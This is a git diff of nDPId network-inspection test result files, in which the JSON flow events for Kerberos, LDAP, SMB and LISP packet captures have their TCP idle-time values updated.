+00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952265,"flow_last_seen":1549337952266,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49192,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952265,"flow_last_seen":1549337952266,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49192,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952280,"flow_last_seen":1549337952281,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49195,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952280,"flow_last_seen":1549337952281,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49195,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00704{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7560000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49196,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7560000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49196,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929983,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49161,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929983,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49161,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931189,"flow_last_seen":1549337931190,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49169,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931189,"flow_last_seen":1549337931190,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49169,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937690,"flow_last_seen":1549337937691,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49179,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937690,"flow_last_seen":1549337937691,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49179,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937700,"flow_last_seen":1549337937701,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49180,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937700,"flow_last_seen":1549337937701,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49180,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952267,"flow_last_seen":1549337952267,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":262,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49191,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952267,"flow_last_seen":1549337952267,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":262,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49191,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952273,"flow_last_seen":1549337952274,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":330,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49193,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952273,"flow_last_seen":1549337952274,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":330,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49193,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929817,"flow_last_seen":1549337929818,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929817,"flow_last_seen":1549337929818,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931220,"flow_last_seen":1549337931221,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931220,"flow_last_seen":1549337931221,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952283,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952283,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49194,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","packets-captured":77,"packets-processed":77,"total-skipped-flows":0,"total-l4-data-len":24133,"total-not-detected-flows":2,"total-guessed-flows":23,"total-detected-flows":11,"total-detection-updates":7,"total-updates":0,"current-active-flows":0,"total-active-flows":36,"total-idle-flows":36,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":192,"global_ts_msec":1549337952283} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 77/77 diff --git a/test/results/kerberos_fuzz.pcapng.out b/test/results/kerberos_fuzz.pcapng.out index adf84efef..313d898a7 100644 --- a/test/results/kerberos_fuzz.pcapng.out +++ b/test/results/kerberos_fuzz.pcapng.out @@ -1,9 +1,9 @@ 00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1633884084000} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","flow_datalink":228,"flow_max_packets":3} -00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1633884084000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":288,"pkt_l4_len":268,"thread_ts_msec":1633884084000,"pkt":"RSYBIAFKAAAABn0BfgQBABMAAAAAWNGOAAAAAAAAAQAgAQAAAAAAAGZfRk9VTgAGA0QNChsbGxsbGxsbGxsbJwYGBgYGBgYGBhsbG10bGwYGBgYGBgYGBg0K\/\/\/\/\/05NRWGMG2VyMUnz8\/NDQQEAAAAAAABdKgC3MFD\/AAAAAABfAAAAAAAAAEVhjGlkO\/\/\/\/\/\/\/b2VyWQAAAAAAAABNRQAAAAAAAAAAAAAAAAAAAAAATUxAU0m3MFCjL1MuMlQg80NBTk1FYYxpZDsNCv\/\/\/\/9OTUVhjBtlcjFJ8\/P\/\/\/\/\/AAAAAAAAXSoAtzBQoy9TLkFOTUVhjGlkOw0K\/\/\/\/\/zsNCv\/\/\/\/8vUy4yVEFUIPNDQU5NRWGMaWQ7DQr\/\/\/\/\/"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"r1i???ca???????]*??0p??????_???????ea?id;?????o","username":"??????"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","flow_datalink":228,"flow_max_packets":3} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","flow_datalink":228,"flow_max_packets":3} +00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1633884084000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":288,"pkt_l4_len":268,"thread_ts_msec":1633884084000,"pkt":"RSYBIAFKAAAABn0BfgQBABMAAAAAWNGOAAAAAAAAAQAgAQAAAAAAAGZfRk9VTgAGA0QNChsbGxsbGxsbGxsbJwYGBgYGBgYGBhsbG10bGwYGBgYGBgYGBg0K\/\/\/\/\/05NRWGMG2VyMUnz8\/NDQQEAAAAAAABdKgC3MFD\/AAAAAABfAAAAAAAAAEVhjGlkO\/\/\/\/\/\/\/b2VyWQAAAAAAAABNRQAAAAAAAAAAAAAAAAAAAAAATUxAU0m3MFCjL1MuMlQg80NBTk1FYYxpZDsNCv\/\/\/\/9OTUVhjBtlcjFJ8\/P\/\/\/\/\/AAAAAAAAXSoAtzBQoy9TLkFOTUVhjGlkOw0K\/\/\/\/\/zsNCv\/\/\/\/8vUy4yVEFUIPNDQU5NRWGMaWQ7DQr\/\/\/\/\/"} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"r1i???ca???????]*??0p??????_???????ea?id;?????o","username":"??????"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1633884084000,"flow_last_seen":1633884084000,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1633884084000,"l3_proto":"ip4","src_ip":"126.4.1.0","dst_ip":"19.0.0.0","src_port":88,"dst_port":53646,"l4_proto":"tcp","flow_datalink":228,"flow_max_packets":3} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-data-len":260,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1633884084000} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 diff --git a/test/results/lisp_registration.pcap.out b/test/results/lisp_registration.pcap.out index c3ab7e398..0d4d5c7d0 100644 --- a/test/results/lisp_registration.pcap.out +++ b/test/results/lisp_registration.pcap.out @@ -5,25 +5,25 @@ 00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152685554,"flow_last_seen":1597152685554,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1597152685554,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1597152685555,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1597152685555,"pkt":"qrvMAAEAqrvMAAIACABFwACAAJcAAP8RsBIKAHsCCgB7ARD2EPYAbMDFMgABAT470dH4ChLaAAEAFJgCmsMIGdOV75RgmwLw3u2YWic1AAAFoAGAEAAAAAAC\/AAAAAAAAAAAAAAAAAAAAhYWFhYABQABCgB7AtD01FgUttPjIYPJQy5LWPIAAAAAAAAAAA=="} 00580{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1597152685555,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1597152685555,"pkt":"qrvMAAEAqrvMAAIACABFwACAAJgAAP8RsBEKAHsCCgB7ARD2EPYAbFMcMgABAecEMPyhgJYjAAEAFLR7gLhELdB05V0IZvC04Du3TwxeAAAFoAEaEAAAAEADAAACIAAKAAAAZAABwKhmABYWFhYABQABCgB7AtD01FgUttPjIYPJQy5LWPIAAAAAAAAAAA=="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152687289,"flow_last_seen":1597152687289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1597152687289,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 